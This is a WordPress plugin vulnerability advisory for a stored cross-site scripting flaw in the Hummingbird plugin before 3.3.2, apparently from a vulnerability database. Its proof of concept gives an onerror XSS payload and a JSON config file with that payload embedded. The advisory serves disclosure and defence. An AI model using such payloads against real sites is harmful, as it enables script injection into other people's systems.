WordPress Plugin Vulnerabilities
Hummingbird < 3.3.2 - Admin+ Stored Cross-Site Scripting
Description
The plugin does not sanitise and escape the Config Name, which could allow high privilege users, such as admin to perform cross-Site Scripting attacks even when the unfiltered_html capability is disallowed
Proof of Concept
Go to Hummingbird's Settings > Configs > edit the "Name and Description" and put the following payload in the Name field: <img src onerror=alert(/XSS/)> Save and Click 'Apply' to trigger the XSS Go to Hummingbird's Settings > Configs and Upload the following config { "id": 1, "name": "<img src onerror=alert(/XSS/)>", "description": "Xss", "config": { "configs": { "settings": { "advanced": { "query_string": false, "emoji": false, "cart_fragments": false, "lazy_load": { "enabled": false } }, "database": { "reports": { "enabled": false } }, "gravatar": { "enabled": true }, "page_cache": { "enabled": true, "detection": "auto", "integrations": { "varnish": false, "opcache": false }, "preload": false }, "performance": [], "rss": { "enabled": true, "duration": 3600 }, "settings": { "accessible_colors": false, "remove_settings": false, "remove_data": false, "control": true }, "uptime": { "enabled": false } } }, "strings": { "advanced": [ "Remove query strings from assets - Inactive\nRemove Emoji JS & CSS files - Inactive\nDisable WooCommerce cart fragments - Inactive\nComments lazy loading - Inactive\n" ], "database": [ "" ], "gravatar": [ "Gravatar cache - Active\n" ], "page_cache": [ "Page cache - Active\nFile change detection - Auto\nPurge Varnish cache - Inactive\nPurge OpCache - Inactive\nCache preloading - Inactive\n" ], "rss": [ "RSS caching - Active\n" ], "settings": [ "High contrast mode - Inactive\nRemove settings on uninstall - Inactive\nRemove data on uninstall - Inactive\nCache control in admin bar - Active\n" ], "uptime": [ "Uptime - Inactive\n" ] } }, "plugin": "1081721" }
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Taurus Omar
Submitter
Taurus Omar
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-03-23 (about 2 years ago)
Added
2022-03-23 (about 2 years ago)
Last Updated
2022-04-13 (about 2 years ago)